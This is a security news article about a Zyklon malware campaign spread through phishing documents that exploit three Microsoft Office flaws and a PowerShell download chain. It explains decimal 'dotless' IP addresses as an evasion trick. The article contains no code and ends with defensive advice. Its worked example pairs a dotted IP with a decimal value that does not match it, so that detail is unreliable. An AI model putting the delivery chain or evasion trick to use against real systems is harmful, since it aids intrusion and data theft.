Dubbed Zyklon, the fully-featured malware has resurfaced after almost two years and primarily found targeting telecommunications, insurance and financial services.
Active since early 2016, Zyklon is an HTTP botnet malware that communicates with its command-and-control servers over Tor anonymising network and allows attackers to remotely steal keylogs, sensitive data, like passwords stored in web browsers and email clients.
Zyklon malware is also capable of executing additional plugins, including secretly using infected systems for DDoS attacks and cryptocurrency mining.
Different versions of the Zyklon malware has previously been found being advertised on a popular underground marketplace for $75 (normal build) and $125 ( Tor-enabled build).
According to a recently published report by FireEye, the attackers behind the campaign are leveraging three following vulnerabilities in Microsoft Office that execute a PowerShell script on the targeted computers to download the final payload from its CC server.
1) .NET Framework RCE Vulnerability (CVE-2017-8759)—this remote code execution vulnerability exists when Microsoft .NET Framework processes untrusted input, allowing an attacker to take control of an affected system by tricking victims into opening a specially crafted malicious document file sent over an email. Microsoft already released a security patch for this flaw in September updates.
2) Microsoft Office RCE Vulnerability (CVE-2017-11882)—it’s a 17-year-old memory corruption flaw that Microsoft patched in November patch update allows a remote attacker to execute malicious code on the targeted systems without requiring any user interaction after opening a malicious document.
3) Dynamic Data Exchange Protocol (DDE Exploit)—this technique allows attackers to leverage a built-in feature of Microsoft Office, called DDE, to perform code execution on the targeted device without requiring Macros to be enabled or memory corruption.
As explained by the researchers, attackers are actively exploiting these three vulnerabilities to deliver Zyklon malware using spear phishing emails, which typically arrives with an attached ZIP file containing a malicious Office doc file.
Once opened, the malicious doc file equipped with one of these vulnerabilities immediately runs a PowerShell script, which eventually downloads the final payload, i.e., Zyklon HTTP malware, onto the infected computer.
“In all these techniques, the same domain is used to download the next level payload (Pause.ps1), which is another PowerShell script that is Base64 encoded,” the FireEye researchers said.
“The Pause.ps1 script is responsible for resolving the APIs required for code injection. It also contains the injectable shellcode.”
“The injected code is responsible for downloading the final payload from the server. The final stage payload is a PE executable compiled with .Net framework.”
Interestingly, the PowerShell script connects to a dotless IP address (example: http://3627732942) to download the final payload.
What is Dotless IP Address? If you are unaware, dotless IP addresses, sometimes referred as ‘Decimal Address,’ are decimal values of IPv4 addresses (represented as dotted-quad notation). Almost all modern web browsers resolve decimal IP address to its equivalent IPV4 address when opened with “http://” following the decimal value.
For example, Google’s IP address 220.127.116.11 can also be represented as http://3627732942 in decimal values (Try this online converter).
The best way to protect yourself and your organisation from such malware attacks are always to be suspicious of any uninvited document sent via an email and never click on links inside those documents unless adequately verifying the source.
Most importantly, always keep your software and systems up-to-date, as threat actors incorporate recently discovered, but patched, vulnerabilities in popular software—Microsoft Office, in this case—to increase the potential for successful infections.